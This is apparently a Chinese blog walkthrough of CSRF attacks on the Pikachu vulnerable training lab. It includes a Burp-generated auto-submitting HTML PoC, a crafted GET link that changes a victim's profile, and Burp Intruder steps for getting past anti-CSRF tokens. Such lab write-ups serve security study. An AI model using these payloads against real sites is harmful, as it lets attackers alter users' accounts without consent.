CSRF攻击实例-Pikachu

pikachu

get

方法

正常用户登录后,修改信息时会向后端发送请求包,抓到此请求包,然后构造恶意链接发给受害者点击

恶意链接

构造 html 页面、然后让被攻击者访问此页面

<html>
<!--CSRF PoC-generated by Burp Suite Professional -->
<body>
 <form  action="http://192.168.65.128/pikachu/vul/csrf/csrfget/csrf_get_edit.php">
<input type="hidden" name="sex" value="girl"/>
<input type="hidden" name="phonenum" value="15911111111" />
<input type="hidden" name="add" value="nba&#32;lakes"/><input type="hidden" name="email" value="hack&#64; pikachu&#46;com"/>
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit request" />
 </form>
 <script>
history.pushstate(". ", '/');
document.forms[0].submit();
</script>
</body>
</html>
将修改页面抓包

在这里插入图片描述

生成poc

在这里插入图片描述

复制POC

在这里插入图片描述
由于是 CET 请求,所以也可以直接发送修改信息的链接给被攻击者访问

http://192.168.65.128/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=15933333333&add=nba+akes&email=hack%40pikachu.com&submit=submit

post

方法

正常用户登录后,修改信息时会向后端发送请求包,抓到此请求包,然后构造恶意链接发给受害者点击
流程同get方法

Token

将数据包发送到 Intruder 模块

在这里插入图片描述

攻击模式选择 Pitchfork

将需要修改的信息和 token 设置为可变量

在这里插入图片描述

设置信息的 payload,正常设置即可

设置 token 的 payload

Options->Grep-Extract

点击 Add
在这里插入图片描述
点击 Refetch response
在这里插入图片描述
双击 value 后的值,并复制下来
在这里插入图片描述
勾选 Update config based on selectionbelow(默认)
在这里插入图片描述
点击 OK

Options->Redirections

选择always
在这里插入图片描述

payload2 选择 Recursive grep

将前面复制的 token 填入输入框,勾选 Stop ifduplicate payload found
在这里插入图片描述

创建单线程

在这里插入图片描述

开始攻击
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值